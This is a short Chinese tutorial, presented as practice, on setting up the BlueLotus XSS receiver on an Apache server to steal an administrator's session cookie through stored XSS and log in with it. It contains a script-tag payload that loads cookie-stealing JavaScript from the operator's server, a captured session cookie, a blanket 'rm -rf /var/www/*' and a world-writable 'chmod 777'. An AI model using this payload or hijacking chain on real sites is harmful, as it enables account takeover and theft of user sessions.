構造個人輕量級XSS平臺獲取管理員cookie並登錄
一、前言
本平臺是個人輕量級XSS測試平臺,僅作為練習參考。
二、實驗環境
服務器操作系統:Centos 6.6
Web容器:Apache
三、平臺搭建過程
安裝Apache
安裝PHP
安裝Git工具
從GitHub克隆XSS平臺源碼
刪除默認網站內容
rm -rf /var/www/*
創建新的網站目錄
mkdir /var/www/xss
從GitHub克隆xss測試源碼(https://github.com/firesunCN/BlueLotus_XSSReceiver.git)
git clone https://github.com/firesunCN/BlueLotus_XSSReceiver.git /var/www/xss/
授權
chmod -R 777 /var/www/xss/
配置Apache
允許使用 .htaccess文件
在文件末尾加上
Include /etc/httpd/conf/vhost/httpd-vhosts.conf
開機啟動Apache服務
chkconfig httpd on
重新加載Apache配置文件
service httpd reload
安裝XSS平臺
訪問服務器ip地址,點擊安裝
主要修改後臺登錄密碼和數據加密密碼,其余保持默認,然後提交
安裝成功,點擊登錄
成功登錄
功能測試
點擊我的JS,插入模板,選擇Defualt.js,修改網站服務器ip地址
http://192.168.75.129/index.php
生成payload
<script src="http://192.168.75.129/myjs/cookie.js"></script>
成功獲取用戶cookie
ASPSESSIONIDCQBSTQBB=BHILNFDBLNPBDMOBFPHNOFBJ
利用Google瀏覽器插件edit this cookie修改cookie登錄
到此存儲型xss註入獲取管理員cookie並登錄已經圓滿完成。
構造個人輕量級XSS平臺獲取管理員cookie並登錄